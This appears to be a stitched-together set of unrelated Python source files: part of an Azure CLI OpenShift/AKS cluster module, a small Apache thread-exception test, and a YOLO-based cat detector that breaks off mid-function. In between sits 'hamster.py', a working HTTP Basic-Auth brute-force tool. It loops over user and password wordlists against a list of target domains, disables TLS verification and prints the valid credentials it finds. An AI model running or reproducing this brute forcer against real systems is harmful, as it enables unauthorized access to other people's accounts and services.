    Scale the 'compute' agent pool of an OpenShift managed cluster to
    ``compute_count`` nodes.

    :param compute_count: desired node count (coerced with int()).
    :param no_wait: do not block on the long-running update operation.
    """
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    instance = client.get(resource_group_name, name)
    # TODO: change this approach when we support multiple agent pools.
    # Locate the 'compute' pool; fall back to index 0 when it is not found
    # (same behavior as the original index-based loop).
    idx = 0
    for i, profile in enumerate(instance.agent_pool_profiles):
        if profile.name.lower() == "compute":
            idx = i
            break
    instance.agent_pool_profiles[idx].count = int(
        compute_count)  # pylint: disable=no-member
    # null out the AAD profile and add manually the masterAP name because otherwise validation complains
    instance.master_pool_profile.name = "master"
    instance.auth_profile = None
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
    """Enable Log Analytics monitoring on an existing OpenShift managed cluster."""
    OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='open_shift_managed_clusters')
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    instance = client.get(resource_group_name, name)
    # Point the cluster's monitor profile at the normalized workspace resource id.
    instance.monitor_profile = OpenShiftManagedClusterMonitorProfile(
        enabled=True,
        workspace_resource_id=_format_workspace_id(workspace_id))
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
    """Disable Log Analytics monitoring on an existing OpenShift managed cluster."""
    OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='open_shift_managed_clusters')
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    instance = client.get(resource_group_name, name)
    # Replace the profile with an explicitly disabled one (no workspace attached).
    instance.monitor_profile = OpenShiftManagedClusterMonitorProfile(
        enabled=False,
        workspace_resource_id=None)
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or
managed_cluster.identity.type.casefold() == "userassigned"))
def _put_managed_cluster_ensuring_permission(
        cmd,  # pylint: disable=too-many-locals,too-many-statements,too-many-branches
        client,
        subscription_id,
        resource_group_name,
        name,
        managed_cluster,
        monitoring_addon_enabled,
        ingress_appgw_addon_enabled,
        virtual_node_addon_enabled,
        need_grant_vnet_permission_to_cluster_identity,
        vnet_subnet_id,
        enable_managed_identity,
        attach_acr,
        headers,
        no_wait
):
    """
    PUT the managed cluster and perform any role assignments that can only be
    made after the cluster (and its identities) exist.

    When a post-creation role assignment is needed, the call waits for the
    long-running operation to finish (ignoring no_wait) so the created
    cluster's identities are available; otherwise it honors no_wait and
    returns the poller/result from sdk_no_wait.

    :return: the created/updated cluster (or the no-wait poller).
    """
    # some addons require post cluster creation role assigment
    need_post_creation_role_assignment = (monitoring_addon_enabled or
                                          ingress_appgw_addon_enabled or
                                          (enable_managed_identity and attach_acr) or
                                          virtual_node_addon_enabled or
                                          need_grant_vnet_permission_to_cluster_identity)
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
            resource_group_name=resource_group_name,
            resource_name=name,
            parameters=managed_cluster,
            headers=headers))
        cloud_name = cmd.cli_ctx.cloud.name
        # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
        # mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
        if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            _add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(cluster, cmd)
        if virtual_node_addon_enabled:
            _add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
        if need_grant_vnet_permission_to_cluster_identity:
            # Grant the cluster's own identity Network Contributor on the subnet;
            # failure is reported but not fatal (the cluster already exists).
            if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                           cluster.identity.principal_id, scope=vnet_subnet_id,
                                           resolve_assignee=False):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')
        if enable_managed_identity and attach_acr:
            # Attach ACR to cluster enabled managed identity
            if cluster.identity_profile is None or \
                    cluster.identity_profile["kubeletidentity"] is None:
                # Best-effort: warn instead of failing the whole create.
                logger.warning('Your cluster is successfully created, but we failed to attach '
                               'acr to it, you can manually grant permission to the identity '
                               'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
                               'it permission to pull from ACR.')
            else:
                kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
                _ensure_aks_acr(cmd.cli_ctx,
                                client_id=kubelet_identity_client_id,
                                acr_name_or_id=attach_acr,
                                subscription_id=subscription_id)
    else:
        # No post-creation work needed: honor no_wait.
        cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
                              resource_group_name=resource_group_name,
                              resource_name=name,
                              parameters=managed_cluster,
                              headers=headers)
    return cluster
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
    """
    Ensure the cluster identity holds the Managed Identity Operator role on
    the kubelet identity scope, creating the role assignment when missing.

    Raises UnauthorizedError when the assignment cannot be created.
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    # Scan existing assignments at this exact scope; return early when an
    # equivalent assignment is already present.
    for assignment in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
        if (assignment.scope.lower() == scope.lower() and
                assignment.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID) and
                assignment.principal_id.lower() == cluster_identity_object_id.lower()):
            # already assigned
            return
    if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
                                is_service_principal=False, scope=scope):
        raise UnauthorizedError('Could not grant Managed Identity Operator '
                                'permission to cluster identity at scope {}'.format(scope))
|
hamster.py | import argparse
import requests
from requests.auth import HTTPBasicAuth
from threading import Thread
import time
from colorama import init, Fore, Back, Style
import pdb
import urllib3
import ssl
urllib3.disable_warnings()
from multiprocessing import Process
class File():
    """Minimal context manager wrapping open()/close() for a file."""

    def __init__(self, fileName, mode):
        # Remember what to open and how; the file is opened lazily in __enter__.
        self.fileName = fileName
        self.mode = mode

    def __enter__(self):
        self._handle = open(self.fileName, self.mode)
        return self._handle

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Always release the OS handle, even when the with-body raised.
        self._handle.close()
class Attack:
    """
    HTTP Basic-Auth brute forcer: loads user/password/domain lists from the
    command line, then probes each domain with every user/password pair.
    """

    def __init__(self):
        # CLI definition: capital options take wordlist files, lowercase
        # options take single values.
        self.parser = argparse.ArgumentParser(description="Hamster v1 && github.com/ferhatcil")
        self.parser.add_argument('-U', '--users', required=False, help="you can upload a txt file filled with usernames")
        self.parser.add_argument('-P', '--passwords', required=False, help="you can upload a txt file filled with passwords")
        self.parser.add_argument('-u', '--user', required=False, help="you can specify only one username")
        self.parser.add_argument('-p', '--password', required=False, help="you can specify only one password")
        self.parser.add_argument('-D', '--domains', required=False, help="you can upload a txt file filled with domains")
        self.parser.add_argument('-d', '--domain', required=False, help="you can specify only one domain")
        # NOTE(review): the -v help text looks copy-pasted from -U; -v actually
        # enables verbose per-attempt output in bruter().
        self.parser.add_argument('-v', action='store_true', default=False, help="you can upload a txt file filled with usernames")
        self.args = self.parser.parse_args()
        # Set True once a valid credential pair is found for the current target.
        self.status = False
        self.loader()

    def loader(self):
        """
        Populate users/passwords/domains from the wordlist files and the
        single-value flags, then fan out one bruter process per domain and
        wait for all of them.
        """
        self.users = []
        self.passwords = []
        self.domains = []
        # Only the first whitespace-separated token of each line is kept.
        if (self.args.users):
            with File(self.args.users, 'r') as file:
                for line in file:
                    self.users.append(line.strip().split(" ")[0])
        if (self.args.passwords):
            with File(self.args.passwords, 'r') as file:
                for line in file:
                    self.passwords.append(line.strip().split(" ")[0])
        if (self.args.domains):
            with File(self.args.domains, 'r') as file:
                for line in file:
                    self.domains.append(line.strip().split(" ")[0])
        if (self.args.user):
            self.users.append(self.args.user)
        if (self.args.password):
            self.passwords.append(self.args.password)
        if (self.args.domain):
            self.domains.append(self.args.domain)
        procs = []
        # NOTE(review): this first process runs bruter('') which returns
        # immediately (empty url) — presumably leftover scaffolding.
        proc = Process(target=self.bruter, args=('',))
        procs.append(proc)
        proc.start()
        # One worker process per target domain.
        for url in self.domains:
            proc = Process(target=self.bruter, args=(url,))
            procs.append(proc)
            proc.start()
        for proc in procs:
            proc.join()

    def bruter(self, url):
        """
        Probe a single URL; when it answers 401, try every user/password
        combination with HTTP Basic Auth until one returns 200.
        """
        try:
            #pdb.set_trace()
            if url:
                try:
                    # TLS verification is disabled (ssl.CERT_NONE is falsy).
                    r = requests.get(url, verify=ssl.CERT_NONE)
                except requests.exceptions.ConnectionError:
                    print("{} address could not be reached at the moment. If you are browsing with a domain list, please remove the unreachable domains from your list for the health of the program.".format(url))
                self.status = False
                # NOTE(review): if the GET above failed, `r` is unbound here;
                # the outer `except UnboundLocalError` is what catches that.
                if r.status_code == 401:
                    for user in self.users:
                        for passw in self.passwords:
                            resp = requests.get(url, auth = HTTPBasicAuth(username=user, password=passw), verify=ssl.CERT_NONE)
                            if (resp.status_code == 200):
                                print(Fore.GREEN + "[+]" + Style.RESET_ALL + " {} username: {} password: {}".format(url,user,passw))
                                self.status = True
                                break
                            elif(self.args.v == True):
                                print(Fore.RED + "[-]" + Style.RESET_ALL + " {} username: {} password: {}".format(url,user,passw))
                        # Stop iterating users once a hit was found.
                        if self.status == True:
                            break
                elif(self.args.v==True):
                    print(Fore.RED + "[-]" + Style.RESET_ALL + " There is no HTTPBasicAuth at the {} address".format(url))
        except requests.exceptions.SSLError:
            print("SSLError")
        except UnboundLocalError:
            print("UnboundLocalError")
        except KeyboardInterrupt:
            pass
# Entry point: Attack() parses argv and runs the whole attack in __init__.
if __name__ == '__main__':
    try:
        go = Attack()
    except KeyboardInterrupt:
        print(" GoodBye!")
|
test_threading.py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from aria.utils import threading
def test_exception_raised_from_thread():
    """An exception raised inside an ExceptionThread is captured and re-raised on demand."""
    def raise_value_error():
        raise ValueError('This is an error')

    worker = threading.ExceptionThread(target=raise_value_error)
    worker.start()
    worker.join()

    assert worker.is_error()
    with pytest.raises(ValueError):
        worker.raise_error_if_exists()
|
object-ident.py | import cv2
import time
import os
import pprint
import re
import numpy as np
import pygame
import queue
import threading
import signal
import sys
import ffmpeg
pp = pprint.PrettyPrinter(indent=4)
# Detection thresholds: minimum confidence and non-max-suppression overlap.
CONF_THRESH, NMS_THRESH = 0.9, 0.5
classNames = []
# Sound played after a run of consecutive cat detections (see mainLoop).
soundMeow = "/z/camera/Meow-cat-sound-effect.mp3"
pygame.mixer.init()
pygame.mixer.music.load(soundMeow)
#pygame.mixer.music.play()
# Catalog of YOLO config/weights/class-name file sets, keyed by model version.
cw = {}
cw["yolov3"] = {}
cw["yolov3"]["configPath"] = "/home/dpd/darknet-yolo4/cfg/yolov3.cfg"
cw["yolov3"]["weightsPath"] = "/home/dpd/darknet/yolov3.weights"
cw["yolov3"]["coconames"] = "/home/dpd/darknet-yolo4/data/coco.names"
cw["yolov4tiny"] = {}
cw["yolov4tiny"]["configPath"] = "/home/dpd/darknet-yolo4/cfg/yolov4-tiny.cfg"
cw["yolov4tiny"]["weightsPath"] = "/z/camera/yolov4-tiny.conv.29"
cw["yolov4tiny"]["coconames"] = "/home/dpd/darknet-yolo4/data/coco.names"
cw["yolov4tiny.custom"] = {}
cw["yolov4tiny.custom"]["configPath"] = "/z/camera/communitycats/custom_data/cfg/yolov-tiny-custom.cfg"
cw["yolov4tiny.custom"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom_final.weights"
cw["yolov4tiny.custom"]["coconames"] = "/z/camera/communitycats/custom_data/custom.names.7"
cw["yolo.320v1"] = {}
cw["yolo.320v1"]["configPath"] = "/z/camera/communitycats/custom_data/cfg/yolov-tiny-custom-320v1.cfg"
cw["yolo.320v1"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom_final-320v1.weights"
cw["yolo.320v1"]["coconames"] = "/z/camera/communitycats/custom_data/custom.names.7"
cw["yolo.416v1.64"] = {}
cw["yolo.416v1.64"]["configPath"] = "/z/camera/communitycats/custom_data/cfg/yolov-tiny-custom-416v1-64.cfg"
cw["yolo.416v1.64"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom_final-416v1-64.weights"
cw["yolo.416v1.64"]["coconames"] = "/z/camera/communitycats/custom_data/backup/custom.names.7"
cw["yolo.416v2.64"] = {}
cw["yolo.416v2.64"]["configPath"] = "/z/camera/communitycats/custom_data/cfg/yolov-tiny-custom-416v2-64.cfg"
cw["yolo.416v2.64"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom_final-416v2-64.weights"
cw["yolo.416v2.64"]["coconames"] = "/z/camera/communitycats/custom_data/backup/custom.names.9"
cw["yolo.416v3.64"] = {}
cw["yolo.416v3.64"]["configPath"] = "/z/camera/communitycats/custom_data/cfg/yolov-tiny-custom-416v3-64.cfg"
#cw["yolo.416v3.64"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom_final-416v3-64.weights"
cw["yolo.416v3.64"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom-416v3-64_final.weights"
cw["yolo.416v3.64"]["coconames"] = "/z/camera/communitycats/custom_data/backup/custom-names-7v3.txt"
# Model actually used by mainLoop().
pkgVer = "yolo.416v3.64"
classNamesToIds = {}
# Load the class labels for the selected model (one label per line).
with open(cw[pkgVer]["coconames"], "r") as f:
    classes = [line.strip() for line in f.readlines()]
# Pencil palette, as BGR tuples (OpenCV channel order).
colorsPencils = {}
colorsPencils['lime'] = (0, 250, 142)
colorsPencils['maraschino'] = (0, 38, 255)
colorsPencils['tangerine'] = (0, 147, 255)
colorsPencils['lemon'] = (0, 251, 255)
colorsPencils['blueberry'] = (255, 51, 4)
colorsPencils['stawberry'] = (146, 47, 255)
colorsPencils['snow'] = (255, 255, 255)
colorsPencils['lead'] = (33, 33, 33)
colorsPencils['turquoise'] = (255, 253, 0)
colors = []
# colors[classNamesToIds['cat']] = colorsPencils['blueberry']
# colors[classNamesToIds['cat-domino']] = colorsPencils['lemon']
# colors[classNamesToIds['cat-kitten6']] = colorsPencils['stawberry']
# colors[classNamesToIds['cat-olive']] = colorsPencils['maraschino']
# colors[classNamesToIds['opossum']] = colorsPencils['lime']
# colors[classNamesToIds['raccoon']] = colorsPencils['tangerine']
# colors[classNamesToIds['skunk']] = colorsPencils['turquoise']
# Per-class box colors, indexed by class id (order must match `classes`).
colors = (colorsPencils['turquoise'],
          colorsPencils['tangerine'],
          colorsPencils['lime'],
          colorsPencils['maraschino'],
          colorsPencils['stawberry'],
          colorsPencils['lemon'],
          colorsPencils['blueberry']
          )
print (colors)
def ResizeWithAspectRatio(image, width=None, height=None, inter=cv2.INTER_AREA):
    """
    Resize `image` to the given width OR height while preserving its aspect
    ratio; when neither is given, return the image unchanged.
    """
    (orig_h, orig_w) = image.shape[:2]
    if width is None and height is None:
        return image
    if width is not None:
        scale = width / float(orig_w)
        new_size = (width, int(orig_h * scale))
    else:
        scale = height / float(orig_h)
        new_size = (int(orig_w * scale), height)
    return cv2.resize(image, new_size, interpolation=inter)
def getObjects(img, net, thres, nms, draw=True, objects=[], frameCounter=0):
    """
    Run the YOLO net on one frame and draw labelled bounding boxes.

    Returns (annotated image, is_cat flag, list of per-detection dicts with
    frame number, class, confidence and box coordinates).

    NOTE(review): the mutable default `objects=[]` is shared across calls; it
    is unused in the live code path but should become None if ever used.
    NOTE(review): `thres`/`nms` parameters are ignored; the module-level
    CONF_THRESH/NMS_THRESH are used instead — confirm which is intended.
    """
    # Get the output layer from YOLO
    layers = net.getLayerNames()
    # NOTE(review): `i[0] - 1` assumes getUnconnectedOutLayers() returns
    # nested arrays (older OpenCV); newer releases return plain ints.
    output_layers = [layers[i[0] - 1] for i in net.getUnconnectedOutLayers()]
    data = []
    # Read and convert the image to blob and perform forward pass to get the bounding boxes with their confidence scores
    #img = cv2.imread(args.image)
    height, width = img.shape[:2]
    # NOTE(review): scale factor 1/300 is unusual for YOLO (commonly 1/255) — confirm.
    blob = cv2.dnn.blobFromImage(img, 1/300, (416, 416), swapRB=True, crop=False)
    net.setInput(blob)
    layer_outputs = net.forward(output_layers)
    class_ids, confidences, b_boxes = [], [], []
    for output in layer_outputs:
        for detection in output:
            # detection = [cx, cy, w, h, objectness, per-class scores...]
            scores = detection[5:]
            class_id = np.argmax(scores)
            confidence = scores[class_id]
            if confidence > CONF_THRESH:
                # Convert normalized center/size to top-left pixel coordinates.
                center_x, center_y, w, h = (detection[0:4] * np.array([width, height, width, height])).astype('int')
                x = int(center_x - w / 2)
                y = int(center_y - h / 2)
                b_boxes.append([x, y, int(w), int(h)])
                confidences.append(float(confidence))
                class_ids.append(int(class_id))
    # Perform non maximum suppression for the bounding boxes to filter overlapping and low confident bounding boxes
    #indices = cv2.dnn.NMSBoxes(b_boxes, confidences, CONF_THRESH, NMS_THRESH).flatten().tolist()
    try:
        indices = cv2.dnn.NMSBoxes(b_boxes, confidences, CONF_THRESH, NMS_THRESH).flatten().tolist()
        test1 = indices[0]
    except AttributeError:
        # NMSBoxes returned an empty result (no .flatten): nothing detected.
        #print ("AttributeError: no objects detected\n");
        return img, False, data
    i=0
    ih, iw, ic = img.shape
    #print ( " X x Y: {} {}", ih,iw)
    is_cat = False
    # for index in indices:
    #     className = classes[class_ids[index]]
    #     if re.search("^cat", className):
    #         is_cat = 1
    #         is_cat_hash[className] = 1
    #pp.pprint (is_cat_hash)
    for index in indices:
        # Defaults in case the lookups below go out of range.
        x=0
        y=0
        w=200
        h=200
        className = "NotSet"
        conf = "0.00"
        try:
            x, y, w, h = b_boxes[index]
            className = classes[class_ids[index]]
            classId = class_ids[index]
        except IndexError:
            print("IndexError");
        try:
            conf = str(round(confidences[index]*100,2))
        except IndexError:
            print("IndexError: list index out of range index:{} ".format(index))
            print("class_ids: ", class_ids )
            print("confidences", confidences)
        try:
            # Draw the box plus class/confidence at the box, and a running
            # list of detections in the top-left corner of the frame.
            cv2.rectangle(img, (x, y), (x + w, y + h), colors[classId], 2)
            labelx = x + 10
            if re.search("^cat-", className):
                labelx = int(x + w/2 + 10)
            cv2.putText(img, className, (labelx, y - 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.2, colors[classId], 2)
            cv2.putText(img, conf, (labelx, y - 50), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.2, colors[classId], 2)
            cv2.putText(img, className, ( 125, 75+(35*i)), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.3, colors[classId], 2)
            cv2.putText(img, conf, (20, 75+(35*i)), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.3, colors[classId], 2)
            i += 1
            # Any class whose name begins with "cat" flags the frame.
            if re.search("^cat", className):
                is_cat = True
            data.append( {
                'frame': frameCounter,
                'class': className,
                'conf': conf,
                'x':x,
                'y':y,
                'w':w,
                'h':h,
                "is_cat": is_cat
                }
            )
        except IndexError:
            pass
    return img, is_cat, data
#classIds, confs, bbox = net.detect(img,confThreshold=thres,nmsThreshold=nms)
#print(classIds,bbox)
# if len(objects) == 0: objects = classNames
# objectInfo =[]
# if len(classIds) != 0:
# for classId, confidence,box in zip(classIds.flatten(),confs.flatten(),bbox):
# className = classNames[classId - 1]
# if className in objects:
# objectInfo.append([box,className])
# if (draw):
# cv2.rectangle(img,box,color=(0,255,0),thickness=2)
# cv2.putText(img,classNames[classId-1].upper(),(box[0]+10,box[1]+30),
# cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)
# cv2.putText(img,str(round(confidence*100,2)),(box[0]+200,box[1]+30),
# cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)
# return img,objectInfo
# --- Module state for the capture/detect/display pipeline ---
frameCounter = 0
resettimer = 1
frames = 0
catCounter = 1
# Placeholder; the real capture object is created in openVideoStream().
cap = object
#v = "/z/camera/2021-Oct-Night.mkv"
#v = "/z/camera/uploads/c3/2021/10/13/.C3_01_20211013205816-1280x960.mkv"
#v = "/z/camera/uploads/c3/2021/10/12/.C3_01_20211012204541-1280x960.mkv"
#v = "/z/camera/C3_01_20211016002548-0000-0800-1280x960.mkv"
#v = "/z/camera/C3/C3-2021-10-17-0000-0800.mkv"
# Work queue of video entries for openVideoStream() to consume in order.
videos = queue.Queue()
# v = {
#     "videoFile": "/z/camera/2021-Oct-Night-fullrez.mkv",
#     "comment" : ""
# }
# videos.append(v)
# Batch of recordings to process, in playback order.
play = ( "C3-2021-10-20-0000-0800.mkv",
         "C3-2021-10-20-0801-1600.mkv",
         "C3-2021-10-20-1601-2359.mkv",
         "C3-2021-10-21-0000-0800.mkv",
         "C3-2021-10-21-0801-1600.mkv",
         "C3-2021-10-21-1601-2359.mkv",
         "C3-2021-10-22-0000-0800.mkv",
         "C3-2021-10-22-0801-1600.mkv",
         "C3-2021-10-22-1601-2359.mkv",
         "C3-2021-10-23-0000-0800.mkv",
         "C3-2021-10-23-0801-1600.mkv",
         "C3-2021-10-23-1601-2359.mkv",
         )
#
#
# Enqueue every recording with its full path.
for p in play:
    v = {
        "videoFile": "/z/camera/C3/" + p,
        "comment" : ""
    }
    videos.put(v)
# v = {
#     "videoFile": "/z/camera/uploads/c3/2021/10/17/C3_01_20211017235405.mp4",
#     "comment" : "Olive approaching, 1:55"
# }
# videos.append(v)
# v = {
#     "videoFile": "/z/camera/uploads/c3/2021/10/17/C3_01_20211017220622.mp4",
#     "comment" : "Domion approaching, 1:02"
# }
# videos.append(v)
# v = {
#     "videoFile": "/z/camera/uploads/c3/2021/10/17/C3_01_20211017225239.mp4",
#     "comment" : "Domion returns, approaching from left, eating 5:22"
# }
# videos.append(v)
# v = {
#     "videoFile": "/z/camera/C3/C3-2021-10-23-1601-2359.mkv",
#     "comment" : ""
# }
# videos.append(v)
#
#cap = cv2.VideoCapture(v)
# cap = cv2.VideoCapture(v, cv2.CAP_FFMPEG)
#cap = acapture.open(v) # Camera 0, /dev/video0
# (major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
# if int(major_ver) < 3 :
#     fps = cap.get(cv2.cv.CV_CAP_PROP_FPS)
#     print ("Frames per second using video.get(cv2.cv.CV_CAP_PROP_FPS): {0}".format(fps))
# else :
#     fps = cap.get(cv2.CAP_PROP_FPS)
#     print ("Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}".format(fps))
#
# Bounded hand-off queues between the reader, detector and display threads.
framesIn = queue.Queue(100)
framesOut = queue.Queue(100)
ready = queue.Queue(1)
def openVideoStream():
    """
    Pop the next video entry off the `videos` queue and open it with OpenCV.

    For file inputs the container is probed with ffmpeg first, and a CUDA
    hardware decoder (h264_cuvid / hevc_cuvid) is selected by setting
    OPENCV_FFMPEG_CAPTURE_OPTIONS before the capture is constructed.
    Blocks when the queue is empty.
    """
    videoObject = videos.get()
    v = videoObject['videoFile']
    if re.search("^rtsp", v):
        # Live stream: force UDP transport for RTSP.
        os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp"
        print("This is rtsp stream.")
    else:
        vid = ffmpeg.probe(v)
        for stream in vid['streams']:
            print ("\n\nOpening video %s code:[%s][%s] " % ( v,stream['codec_type'], stream['codec_name']))
            if stream['codec_type'] == "video":
                if stream['codec_name'] == "h264":
                    os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "video_codec;h264_cuvid|hwaccel;cuda|hwaccel_output_format;cuda"
                elif stream['codec_name'] == "hevc":
                    os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "video_codec;hevc_cuvid|hwaccel;cuda|hwaccel_output_format;cuda"
                elif stream['codec_name'] == "h265":
                    os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "video_codec;hevc_cuvid|hwaccel;cuda|hwaccel_output_format;cuda"
                else:
                    # NOTE(review): fallback for unrecognized codecs sets an
                    # RTSP transport option on a file input — confirm intent.
                    #os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = ""
                    os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp"
    cap = cv2.VideoCapture(v,cv2.CAP_FFMPEG)
    return cap
def queueFrames():
    """
    Producer thread: read frames from the current capture and push them onto
    `framesIn`; after more than 30 failed reads, release the capture and open
    the next video from the queue. Exits the process when no further stream
    can be opened.
    """
    failures = 0
    cap = openVideoStream()
    while True:
        success, img = cap.read()
        if success:
            framesIn.put(img)
            # NOTE: `failures` is deliberately not reset here — it counts
            # cumulative read failures, matching the original behavior.
        else:
            failures += 1
            if failures > 30:
                cap.release()
                try:
                    cap = openVideoStream()
                    failures = 0
                except Exception:
                    # Was a bare `except:`; narrowed so SystemExit and
                    # KeyboardInterrupt are no longer swallowed.
                    sys.exit(0)
def mainLoop():
    """
    Detection thread: pull frames from `framesIn`, run YOLO via getObjects(),
    push annotated frames to `framesOut`, log each detection in columns, and
    play the meow sound after a run of consecutive cat frames (rate-limited
    to once per 10 seconds).
    """
    # Column labels for the periodic log header.
    labels = {
        'frame': "frame",
        'class': "class",
        'conf': "conf",
        'x':"x",
        'y':"y",
        'w':"w",
        'h':"h",
        "catCounter": "consecCatFr",
        "catTimer": "sec/meow"
    }
    print( "\n\n%(frame)8s %(catCounter)12s %(catTimer)14s %(class)16s %(conf)8s %(x)6s %(y)6s %(w)6s %(h)6s\n" % labels )
    frameCounter = 0
    lineCounter = 0
    catCounter = 1
    # Per-class bookkeeping: totals, per-frame counts, last seen frame,
    # and a short queue of recent frame numbers (burst tracking).
    objectCounter = {}
    objectCounterRef = {}
    objectCounterLastFrame = {}
    objectCounterQ = {}
    for c in classes:
        objectCounter[c] = 0
        objectCounterLastFrame[c] = 0
        objectCounterRef[c] = 0
        objectCounterQ[c] = []
    # Meow every `modulo` consecutive cat frames, at most once per 10 s.
    modulo = 10
    catTimer = time.time() - modulo
    data = {}
    # Load the selected YOLO model and run inference on CUDA.
    net = cv2.dnn.readNetFromDarknet(cw[pkgVer]["configPath"],cw[pkgVer]["weightsPath"]);
    net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
    net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
    while True:
        for c in classes:
            objectCounterRef[c] = 0
        is_cat = False
        frameCounter += 1
        img = framesIn.get()
        img, is_cat, data = getObjects(img,net,0.45,0.2, frameCounter=frameCounter)
        framesOut.put(img)
        # Count consecutive cat frames; reset on any non-cat frame.
        if is_cat:
            catCounter+=1
        else:
            catCounter=1
        for d in data:
            d['catTimer'] = time.time() - catTimer
            c = d["class"]
            d['catCounter'] = catCounter
            objectCounterRef[c] += 1
            # Track gaps between frames in which this class was seen.
            frameGap = d['frame'] - objectCounterLastFrame[c]
            if frameGap == 0 and len(objectCounterQ[c]) < 11:
                pp.pprint( objectCounterQ[c] )
            if frameGap > 0 and frameGap < 11:
                objectCounterQ[c].append(d['frame'])
            elif frameGap > 10:
                objectCounterQ[c] = []
            objectCounterLastFrame[c] = d['frame']
            # Re-print the column header every 25 detection lines.
            if lineCounter % 25 == 0:
                print( "\n\n%(frame)8s %(catCounter)12s %(catTimer)14s %(class)16s %(conf)8s %(x)6s %(y)6s %(w)6s %(h)6s\n" % labels )
            print( "%(frame)8d %(catCounter)12d %(catTimer)14d %(class)16s %(conf)8s %(x)6d %(y)6d %(w)6d %(h)6d" % d )
            #print( "%8s %12s %6d %6d %16s" % ( " ", " ", frameGap, len(objectCounterQ[c]), c ) )
            lineCounter+=1
        # Rate-limited meow: every `modulo` consecutive cat frames and at
        # least 10 seconds since the last play.
        if (catCounter) % modulo == 0:
            end = time.time()
            seconds = end - catTimer
            if seconds > 10:
                catTimer = time.time()
                pygame.mixer.music.play()
        # for c in classes:
        #     if objectCounterRef[c] == 0:
        #         objectCounter[c] = 0
        #     else:
        #         objectCounter[c] += objectCounterRef[c]
def displayImage():
    """Display thread: pop annotated frames from `framesOut` and show them in a resizable window."""
    window_flags = cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO | cv2.WINDOW_GUI_EXPANDED
    cv2.namedWindow("Output", window_flags)
